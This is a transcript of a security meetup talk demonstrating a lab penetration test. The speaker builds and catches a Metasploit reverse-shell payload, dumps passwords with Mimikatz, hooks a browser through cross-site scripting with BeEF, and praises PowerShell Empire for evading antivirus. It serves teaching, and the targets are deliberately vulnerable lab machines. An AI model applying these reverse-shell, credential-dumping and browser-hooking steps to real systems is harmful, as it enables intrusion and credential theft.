system. Woohoo. Yep, we're already system. So let's see, what's next? Now, one thing I would normally do here is type in, well, let me exit out of this shell, back to my interpreter, and load Mimikatz. Failed to load. The reason why is because we're not in a native Windows interpreter, we're in a Java interpreter. So we're going to fix that. So I'm going to open up a new shell, new terminal, and MSF Venom. Oh. MSF Venom is going to give us a payload. So, for example, let's do MSF Venom, and let's list payloads and grep for x64 because I know that Metasploitable 3 is 64-bit Windows. Okay, so the basic options I'm going to use. I'm going to create another interpreter executable. So the payload is going to be this Windows x64 interpreter reverse TCP. We have to give it some arguments here. The format's going to be an executable, and the output's going to be this file. Okay. The file name again. Okay. Now we're going to upload it. Okay, we uploaded it. And let's see what's next. I know there's more than one way to do this, but this is the way I like to do it. And I could background that, but I like to have both of them open at the same time. So I'm going to open up another instance of Metasploit. And I'm going to use exploit multi-handler. And show options. We need to set our payload, and then we'll see even more options. I can't type. Now show options. So we need to set the L host and L port. And you can do it in uppercase or lowercase. I'm going to make it easy and do it in lower. The port and IP address needs to match what we put in MSF Venom. And I'm going to type in exploit, and this is going to be sort of like Netcat earlier. It's going to wait on our shell. Okay. So here we're going to type, let's get our shell. Execute that. We go back over here and we see we have a whole new shell, a whole new interpreter shell. And let's see, now we're going to load Mimikatz. Mimikatz is going to dump some passwords for us. Look at that. We have some plain text passwords. No password cracking required. I can tell you we can spend hours upon hours talking about Mimikatz and Metasploit. We're just glossing over the basics. We will build on this in later meetings and videos and do deep dives in each one of those. For right now, we're just going to cover the basics. So building on this, let's do, if you Google for Windows Interpreter Post, Offensive Security has this documentation on Metasploit. It's called Metasploit Unleashed. So it's a complete guide. It's not extremely in-depth, but it does have the basics. So here's some other post-exploitation modules that we can run. ARP scan the network, check if we're running in a VM, in a virtual machine, collect credentials, which will just give you the hashes, not the actual plain text passwords like Mimikatz. Enum installed applications, logged on users, file shares, dump hashes here again. And we can use these hashes sometimes on like some older versions of Windows. You can actually do what they call pass the hash, and you can actually authenticate and get a shell in other systems without knowing the plain text password, only having the hash. That's been mitigated in more recent versions of Windows. However, it's still very useful in older versions of Windows. If we have a low privilege exploit shell, we can use local exploit suggester. Okay, so that's all for that. See how much time we have left. Getting kind of close to 9 o'clock, so let's skip on out of this. Any questions or comments before I move on? Now, I can say there's a lot more that we haven't covered. Like I said, there's whole books written about how to use Metasploit. We're only glossing over the surface of it. So I'm going to exit. I might leave this open for now. Let's look at some client-side attacks now. Let's look at BEEF, the Browser Exploitation Framework. Okay, so in Kali, I'm going to press the Windows key on my keyboard and I'm going to type in BEEF. Yeah, PowerShell Empire. PowerShell Empire, I'll mention it here, but I'm not going to dig into it because not only are we running out of time, I need to be done with this by 9, about 20 minutes, but also we're going to have a guest speaker who's a pen tester for a very well-known pen testing company. I won't mention him, I won't call him out just in case for some reason he can't show up, but our next meeting, the whole meeting is going to be, the whole 2 hours is going to be about PowerShell Empire. So I'll mention it here in a few minutes if we have time left over, but I'm not going to demo it just yet. I don't want to spoil the fun for our guest speaker. So we've started the service, and now I'm going to open the framework. Be patient, it'll open a browser for us. While we're waiting for this, by the way, PowerShell Empire, I absolutely love it. Definitely something to look forward to when we look at that in the future, to future presentations. I can tell you there's times when Metasploit, Interpreter, is flagged by antivirus and blocked, and But to date, in about 2 years now that I've been using PowerShell Empire, I've never ever experienced antivirus detecting PowerShell Empire. It's just absolutely great. Sometimes I'll use Metasploit, and instead of using an interpreter payload, I'll use a generic shell. And then in that shell on a Windows system, I'll paste in the agent, the PowerShell code to launch an Empire agent. I'll paste it into that shell, and it'll connect to my PowerShell Empire listener. And from there, I'll run some post-exploitation modules that will run mimikatz, do privilege escalation, scan the internal network, and it's extremely stealthy. And like I said, I've never been caught by antivirus for that, so that's something to look forward to. Now the username and password here is beef and beef. Online browsers, offline browsers. Let's give us an online browser. Woohoo, good old Windows XP. I basically keep Windows XP around here in my lab because I'm in my spare time I'm learning some some binary exploits to prepare for taking the OSCE course, and it's good to start out with the very basics. So that's what I'm doing. Now I'm going to install Firefox, an older version of Firefox, and the reason why is because Beef in its more recent versions actually will not work with this old of a version of Internet Explorer. I think we're using IE8 here. Version 6 of Internet Explorer. So even though it's extremely vulnerable, as of some version of Beef, it will no longer hook in Windows XP Internet Explorer 6. So it's just a little bit too old for some reason. So I'm going to start up Firefox. Let's see. Ten 0216. So let's see. We're going to dim vulnerable web app. We're going to sign in. Oops. And we're going to set the security level for this demo to low. We're going to do cross-site scripting. Now, oops. Kali Linux here. The window where we started it. See this script right here? I'm going to move this over to another screen so I can refer back to it. There you go. So this is going to demo cross-site scripting. Let's see, Steve. think I have this right from memory. We'll see. Check this out real quick. Oh, I can't paste it in here. So cross-site scripting, a lot of people, especially developers, tend to dismiss cross-site scripting and think, it just causes a pop-up, why do we need to patch our application? Well, cross-site scripting can actually be used in addition to other exploits like CSRF. And you can also hook a user with Metasploit, for example, using this. And it can also damage a business's reputation if their users are getting exploited when they visit the site and getting malware installed. So let's see how we can exploit this. Here in that window where we started beef, you see this hook? So this is where our web-based console is at, and this is how we need to hook the user. So imagine we email a link to a user in the case of reflected cross-site scripting. And we use let's see. So I think we're good there. You notice how we have a get URL instead of a post. So we see the data we entered in that form up here. Imagine we emailed this link to a user. They clicked on the link. Or in the case of stored cross-site scripting, we embed it in the web page and a user visits and we hook the user. So let's see what we've got over here. So here we go. We've hooked this user. And here's some basic details. Firefox, we can see the version of Firefox that they're running, the language, the platform, a lot of different information here. And for the sake of saving time, I'm not going to cover everything in here, but let's look at commands. Now this color coding. So this color coding here, green means the module can be run inside the victim's browser and is invisible or silent. Orange means the module can run inside the victim's browser and is not invisible. In other words, they're going to see some feedback of some type. Silver, the status of the module is uncertain with respect to the current browser of the victim and should be run on an experimental basis. And red, the module is known not to work with respect to the current browser of the victim. So let's see. So we're running out of time here. There's one last thing I want to show you on how we can take this from cross-site scripting to a interpreter shell. Okay, we're going to use, I know that this version of Firefox, let's skip ahead for a minute. I know that it's vulnerable to this exploit. And I'm going to use Windows Interpreter reverse TCP. So it'll connect back to me. We're going to set vport serve host 10.0.2.6 and show options one last time. Oh, lhost. And let's exploit that. It'll actually give us a URL. So now let's copy this link address. Let's go back in over here and commands, we can search create invisible iframe. So the user will never see this, that we're launching Metasploit against them. So let's execute it. And we're about to finish up with this, but I can tell you that we haven't really done beef much justice. We could spend hours upon hours talking about the browser exploitation framework. We're just glossing over the basics. I can tell you I've used it a few times, not an expert on it, and I still am only scratching the surface. Eventually, we should get an interpreter shell here. Eventually. Yeah, it's only going to make me wait when people are watching. Every time I've demoed this in the past and rehearsed this, this finished in a few seconds. It figures. Okay, it failed for some reason. Let's check one last time to make sure we didn't get a... Oh. Oh, it's an offline browser. No wonder. We don't have a hook in that browser anymore. Let's see what we can do to fix that. Something just changed over here. Yeah, so it's gone offline. That's why it didn't work. So let's see. Ah, browser is locking up. It's not responding. Redirected that time. It just went offline. It crashed the browser again, which is really strange because I actually ran this multiple times preparing for this presentation, and it never crashed a single time. And of course, when I have people watching, I can tell you, going through pen testing with Callie for OSCP, this is a lot of what it's like. You try again, and you try yet again. You adjust, try a workaround. You beat your head against the wall. You get aggravated. You take a little break, try something a little different, and finally something sticks, and you work, and you get that shell and get root. So obviously things don't always work out our way. However, that's all the time I have for tonight. So um, hopefully you get the point of where we're going with this, how dangerous cross-site scripting can be. And so on some future meetup meetings, we'll dig into some of these a little bit further. We'll have a deep dive on Metasploit. Our next meetup will probably be a social for some food and drink. But our next meetup where we give some presentations should have our guest speaker, and we'll be doing a presentation on PowerShell Empire. Feel free to Google that and take a look to see what we're in for. I can tell you it's going to be exciting, and it's definitely very useful. Pen testers use it very frequently. It's a great tool. So I hope you've enjoyed my presentation and had a little laugh at my expense at the failure here at the end. But hey, it's all good. So everyone have a good evening, and thanks for dropping by and giving me your time, and hope to see you again soon.